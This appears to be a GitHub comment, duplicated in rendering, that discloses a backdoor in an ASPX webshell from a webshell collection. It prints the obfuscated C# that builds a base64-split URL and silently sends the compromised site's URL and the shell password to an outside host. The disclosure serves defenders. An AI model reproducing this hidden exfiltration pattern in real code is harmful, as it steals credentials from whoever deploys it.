Here is one I found.
|
HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(YfCnP + this.Request.Url.ToString() + pbzw + Password + ""); HttpWebResponse response = (HttpWebResponse)request.GetResponse(); |
Variable
YfCnP is base64 encoded.
|
string YfCnP = sh; |
|
YfCnP += portble; |
|
YfCnP += vcf; |
|
YfCnP += dwgtg; |
|
YfCnP += bin_data; |
|
YfCnP += fuze; |
|
YfCnP += ouj; |
|
YfCnP += tprq; |
|
YfCnP += idodr; |
|
YfCnP += mtg; |
|
YfCnP += ksgr; |
|
ksgr = Encoding.Default.GetString(Convert.FromBase64String(ksgr)); |
|
mtg = Encoding.Default.GetString(Convert.FromBase64String(mtg)); |
|
idodr = Encoding.Default.GetString(Convert.FromBase64String(idodr)); |
|
tprq = Encoding.Default.GetString(Convert.FromBase64String(tprq)); |
|
ouj = Encoding.Default.GetString(Convert.FromBase64String(ouj)); |
|
fuze = Encoding.Default.GetString(Convert.FromBase64String(fuze)); |
|
bin_data = Encoding.Default.GetString(Convert.FromBase64String(bin_data)); |
|
dwgtg = Encoding.Default.GetString(Convert.FromBase64String(dwgtg)); |
|
vcf = Encoding.Default.GetString(Convert.FromBase64String(vcf)); |
|
portble = Encoding.Default.GetString(Convert.FromBase64String(portble)); |
|
sh = Encoding.Default.GetString(Convert.FromBase64String(sh)); |
|
string portble = "cDovLw=="; |
|
string dwgtg = "dy50cm95"; |
|
string bin_data = "cGxhbi4="; |
|
string fuze = "Y29tL2FydGlj"; |
|
string tprq = "bmZvLw=="; |
|
string idodr = "Z2suYXM="; |
|
string ksgr = "P25hbWU9"; |
Decode
YfCnP:
http://www.troyplan.com/article/info/gk.aspx?name=
Maybe there are more backdoors in webshells, use with caution.
Don't be evil.
Here is one I found.
WebShell/Aspx/专版aspx汗血宝马.aspx
Line 54 in f7cd87f
Variable
YfCnPis base64 encoded.WebShell/Aspx/专版aspx汗血宝马.aspx
Lines 39 to 49 in f7cd87f
WebShell/Aspx/专版aspx汗血宝马.aspx
Lines 519 to 529 in f7cd87f
WebShell/Aspx/专版aspx汗血宝马.aspx
Line 2081 in f7cd87f
WebShell/Aspx/专版aspx汗血宝马.aspx
Line 1724 in f7cd87f
WebShell/Aspx/专版aspx汗血宝马.aspx
Line 1662 in f7cd87f
WebShell/Aspx/专版aspx汗血宝马.aspx
Line 1561 in f7cd87f
WebShell/Aspx/专版aspx汗血宝马.aspx
Line 1495 in f7cd87f
WebShell/Aspx/专版aspx汗血宝马.aspx
Line 1466 in f7cd87f
WebShell/Aspx/专版aspx汗血宝马.aspx
Line 1449 in f7cd87f
WebShell/Aspx/专版aspx汗血宝马.aspx
Line 1297 in f7cd87f
WebShell/Aspx/专版aspx汗血宝马.aspx
Line 1179 in f7cd87f
WebShell/Aspx/专版aspx汗血宝马.aspx
Line 589 in f7cd87f
WebShell/Aspx/专版aspx汗血宝马.aspx
Line 499 in f7cd87f
Decode
YfCnP:http://www.troyplan.com/article/info/gk.aspx?name=Maybe there are more backdoors in webshells, use with caution.
Don't be evil.